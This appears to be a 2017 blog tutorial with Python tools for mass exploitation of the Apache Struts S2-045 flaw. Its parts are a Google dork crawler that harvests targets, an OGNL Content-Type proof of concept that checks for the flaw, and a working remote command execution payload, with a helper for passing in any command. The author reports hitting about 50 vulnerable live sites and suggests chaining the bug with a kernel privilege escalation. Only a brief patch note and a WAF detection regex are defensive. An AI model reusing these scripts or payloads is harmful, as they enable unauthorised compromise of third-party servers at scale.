Batch Detection and Exploitation of the Struts S2-045 Vulnerability


Introduction

Details of the S2-045 remote code execution vulnerability are on CNVD: http://www.cnvd.org.cn/flaw/show/CNVD-2017-02474. When the vulnerability first came out, a casual Google search for related URLs (filetype:action || ext:action) turned up plenty of targets, and after exploiting a few it became clear that many of them even run Tomcat as root. Tsk tsk...

By now, many companies have scrambled to patch the vulnerability. Even so, there are still large numbers of unpatched targets on the Internet... apparently they just don't care.

The batch S2-045 tooling is written in Python 2.7. The code comes in three parts and is fairly rough; corrections are welcome.

Part 1: batch-crawl target URLs from Google;

Part 2: verify and filter the URLs that are actually vulnerable;

Part 3: execute remote commands.

1. Crawling URLs from Google

When crawling target URLs, Google may rate-limit the requests. If you have IP resources, you can keep switching proxies and crawl with multiple threads (see the proxy-rotation sketch after the file list below).

—keywords file—–> the search keywords, e.g. filetype:action, ext:action

—user_agents file—–> User-Agent strings, one of which is picked at random per request

—urlresult file—–> stores the crawled URLs
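
Proxy rotation is not implemented in the crawler below. The following is a minimal sketch of my own (not part of the original script) showing how each request could be routed through a randomly chosen HTTP proxy with urllib2; the ./proxies file is a hypothetical list of proxies, and the crawler's search() loop could build an opener like this instead of calling urllib2.urlopen directly.

# -*- coding: utf-8 -*-
# Sketch: per-request proxy rotation with urllib2 (not part of the original crawler).
# './proxies' is a hypothetical file with one "host:port" HTTP proxy per line.
import random
import urllib2

def load_proxies(path='./proxies'):
    return [line.strip() for line in open(path) if line.strip()]

def fetch_via_random_proxy(url, proxies, timeout=40):
    proxy = random.choice(proxies)
    # route both http and https requests through the chosen proxy
    opener = urllib2.build_opener(
        urllib2.ProxyHandler({'http': proxy, 'https': proxy}))
    request = urllib2.Request(url)
    request.add_header('User-agent', 'Mozilla/5.0')
    return opener.open(request, timeout=timeout).read()

if __name__ == '__main__':
    proxies = load_proxies()
    print fetch_via_random_proxy('https://www.google.com.hk/', proxies)[:200]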

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Created by Meibenjin.
# Modified by William
# Last updated: 2017-03-10
# google search results crawler

import sys
import urllib2, socket, time
import gzip, StringIO
import re, random, types
from bs4 import BeautifulSoup

base_url = 'https://www.google.com.hk/'
results_per_page = 10
user_agents = list()

# results from the search engine
class SearchResult:
    def __init__(self):
        self.url = ''

    def getURL(self):
        return self.url

    def setURL(self, url):
        self.url = url

    def printIt(self, prefix=''):
        print 'url\t->', self.url

    def writeFile(self, filename):
        file = open(filename, 'a')
        try:
            file.write(self.url + '\n')
        except IOError, e:
            print 'file error:', e
        finally:
            file.close()

class GoogleAPI:
    def __init__(self):
        timeout = 40
        socket.setdefaulttimeout(timeout)

    def randomSleep(self):
        sleeptime = random.randint(60, 120)
        time.sleep(sleeptime)

    # extract a url from a link
    def extractUrl(self, href):
        url = ''
        pattern = re.compile(r'(http[s]?://[^&]+)&', re.U | re.M)
        url_match = pattern.search(href)
        if (url_match and url_match.lastindex > 0):
            url = url_match.group(1)
        return url

    # extract search results list from downloaded html file
    def extractSearchResults(self, html):
        results = list()
        soup = BeautifulSoup(html, "html.parser")
        div = soup.find('div', id='search')
        if (type(div) != types.NoneType):
            #modify 'li' to 'div'
            lis = div.findAll('div', {'class': 'g'})
            if (len(lis) > 0):
                for li in lis:
                    result = SearchResult()
                    h3 = li.find('h3', {'class': 'r'})
                    if (type(h3) == types.NoneType):
                        continue
                    # extract url from h3 object
                    link = h3.find('a')
                    if (type(link) == types.NoneType):
                        continue
                    url = link['href']
                    url = self.extractUrl(url)
                    if (cmp(url, '') == 0):
                        continue
                    result.setURL(url)
                    results.append(result)
        return results

    # search web
    # @param query -> query key words
    # @param lang -> language of search results
    # @param num -> number of search results to return
    def search(self, query, lang='en', num=results_per_page):
        search_results = list()
        query = urllib2.quote(query)
        if (num % results_per_page == 0):
            pages = num / results_per_page
        else:
            pages = num / results_per_page + 1
        for p in range(0, pages):
            start = p * results_per_page
            url = '%s/search?hl=%s&num=%d&start=%s&q=%s' % (base_url, lang, results_per_page, start, query)
            retry = 3
            while (retry > 0):
                try:
                    request = urllib2.Request(url)
                    length = len(user_agents)
                    index = random.randint(0, length - 1)
                    user_agent = user_agents[index]
                    request.add_header('User-agent', user_agent)
                    request.add_header('connection', 'keep-alive')
                    request.add_header('Accept-Encoding', 'gzip')
                    request.add_header('referer', base_url)
                    response = urllib2.urlopen(request)
                    html = response.read()
                    if (response.headers.get('content-encoding', None) == 'gzip'):
                        html = gzip.GzipFile(fileobj=StringIO.StringIO(html)).read()
                    results = self.extractSearchResults(html)
                    search_results.extend(results)
                    break
                except urllib2.URLError, e:
                    print 'url error:', e
                    self.randomSleep()
                    retry = retry - 1
                    continue
                except Exception, e:
                    print 'error:', e
                    retry = retry - 1
                    self.randomSleep()
                    continue
        return search_results

def load_user_agent():
    fp = open('./user_agents', 'r')
    line = fp.readline().strip('\n')
    while (line):
        user_agents.append(line)
        line = fp.readline().strip('\n')
    fp.close()

def crawler():
    # Load user agent strings from file
    load_user_agent()

    # Create a GoogleAPI instance
    api = GoogleAPI()

    # expected number of search results to crawl
    expect_num = 100
    # if no parameters, read query keywords from file
    if (len(sys.argv) < 2):
        keywords = open('./keywords', 'r')
        keyword = keywords.readline()
        while (keyword):
            results = api.search(keyword, num=expect_num)
            for r in results:
                r.printIt()
                r.writeFile('urlresult')
            keyword = keywords.readline()
        keywords.close()
    else:
        keyword = sys.argv[1]
        results = api.search(keyword, num=expect_num)
        for r in results:
            r.printIt()
            r.writeFile('urlresult')

if __name__ == '__main__':
    crawler()

2. PoC Vulnerability Verification

Verify whether each crawled URL is vulnerable to S2-045. The PoC sends an OGNL expression in the Content-Type header; a vulnerable Struts 2 Jakarta multipart parser evaluates it and writes the marker string back into the response, which is what the check looks for.

—urlresult file—–> the crawled URLs stored earlier

—detectresult file—–> stores the URLs verified as vulnerable

# -*- coding: utf-8 -*-

import urllib2

S2_045 = {"poc": "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('fuck')).(#o.close())}", "key": "fuck"}


def poccheck(timeout):
    urls = open('../GoogleSearch/urlresult', 'r')
    detectresults = open('./detectresult', 'w')
    for url in urls.readlines():
        url = url.strip('\n')
        url = url.split('%3F', 1)[0]
        request = urllib2.Request(url)
        request.add_header("Content-Type", S2_045["poc"])
        request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0")
        try:
            res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
        except Exception, e:
            print 'exception:'+url
            continue
        if S2_045['key'] in res_html:
            print S2_045['key']+':'+url
            detectresults.write(url+'\n')
    urls.close()
    detectresults.close()

if __name__ == "__main__":
    poccheck(10)
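
For spot-checking a single target without going through the urlresult file, here is a small standalone sketch of my own (the script layout and argument handling are assumptions; the Content-Type probe and marker are the same as in S2_045 above):

# -*- coding: utf-8 -*-
# Sketch: one-off S2-045 check of a single URL passed on the command line
# (my own addition; same probe and marker as the script above).
import sys
import urllib2

POC = "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('fuck')).(#o.close())}"

def check(url, timeout=10):
    request = urllib2.Request(url)
    request.add_header("Content-Type", POC)
    request.add_header("User-Agent", "Mozilla/5.0")
    try:
        body = urllib2.urlopen(request, timeout=timeout).read(204800)
    except Exception:
        return False
    return 'fuck' in body

if __name__ == '__main__':
    target = sys.argv[1]
    if check(target):
        print 'vulnerable: ' + target
    else:
        print 'not vulnerable (or unreachable): ' + target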

3. Remote Command Execution

Execute remote commands against the URLs already verified as vulnerable.

The code runs whoami. For some of the verified URLs, remote command execution raises an exception or just returns an HTML page; my guess is that Struts 2 on those targets has not actually been patched, and the defense is only detection and response at the application layer.

—detectresult file—–> the verified vulnerable URLs stored earlier

—exploitresult file—–> stores the whoami output

# -*- coding: utf-8 -*-

import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

def exploit():
    urls = open('../S2045Detection/detectresult', 'r')
    exploitresults = open('./exploitresult', 'w')
    for url in urls.readlines():
        url = url.strip('\n')
        register_openers()
        datagen, header = multipart_encode({"image1": url})
        header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"]="%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+'whoami'+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        request = urllib2.Request(url,datagen,headers=header)
        try:
            response = urllib2.urlopen(request, timeout=10)
            result = response.read(204800)
        except Exception, e:
            print 'exception:'+url
        else:
            if len(result) > 100:
                print 'html:'+url
            else:
                print result.strip('\n')+':'+ url
                exploitresults.write(result)
    urls.close()
    exploitresults.close()

if __name__ == "__main__":
    exploit()
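
The whoami command is hard-coded inside the long Content-Type string above. As a small refactoring of my own (not in the original script), the same payload can be split so that the command becomes a parameter; note that the command must not contain single quotes, or it breaks out of the OGNL string literal.

# -*- coding: utf-8 -*-
# Sketch (my own refactoring): build the S2-045 command-execution Content-Type
# header for an arbitrary command instead of editing the long string inline.

def build_exploit_header(cmd='whoami'):
    # cmd must not contain single quotes, or it escapes the OGNL string literal
    prefix = (
        "%{(#nikenb='multipart/form-data')."
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        "(#_memberAccess?(#_memberAccess=#dm):"
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        "(#ognlUtil.getExcludedPackageNames().clear())."
        "(#ognlUtil.getExcludedClasses().clear())."
        "(#context.setMemberAccess(#dm)))).(#cmd='")
    suffix = (
        "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")
    return prefix + cmd + suffix

# e.g. header["Content-Type"] = build_exploit_header('id')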


Results:

Google starts returning 503 status codes before even 300 URLs have been crawled; a paid search API, rotating proxies, or multiple processes could further improve efficiency (a rough multi-process sketch of my own follows).
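
A rough sketch of spreading the queries over several worker processes (my own addition; google_crawler.py is a hypothetical file name for the crawler in part 1, and this only helps if each worker also goes out through a different proxy, otherwise all workers hit the same rate limit):

# -*- coding: utf-8 -*-
# Sketch: run the Google queries in several worker processes.
# Assumes the crawler from part 1 is saved as google_crawler.py (hypothetical name).
from multiprocessing import Pool

from google_crawler import GoogleAPI, load_user_agent

def search_keyword(keyword):
    load_user_agent()                 # populate the user_agents list in this process
    api = GoogleAPI()
    return [r.getURL() for r in api.search(keyword, num=100)]

if __name__ == '__main__':
    keywords = [line.strip() for line in open('./keywords') if line.strip()]
    pool = Pool(processes=4)          # worker count chosen arbitrarily
    with open('urlresult', 'a') as out:
        for urls in pool.map(search_keyword, keywords):
            for url in urls:
                out.write(url + '\n')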

A small-scale tally: out of roughly 200 target URLs, about 50 came back as vulnerable.

On Linux, even when the service runs as a non-root user, combining this with a local privilege escalation (kernel bugs such as Dirty COW, which most production servers have not patched) makes the damage severe.


On protection:


Besides upgrading to the fixed Struts 2 versions (2.3.32 or 2.5.10.1), you can temporarily deploy WAF rules to block the attack traffic.


Appendix: Imperva WAF blocking rule


 Signature Pattern: part="Content-Type", part="multipart/form-data", part="_memberAccess", rgxp="^Content-Type\s*:[^\x0A\x0D]*multipart\/form-data[^\x0A\x0D]*_memberAccess"

 Protocols: http, https

 Search Signature In: Headers

References:


https://github.com/meibenjin/GoogleSearchCrawler


https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/st2_eval.py


*Author of this article: wwwillgaiiam


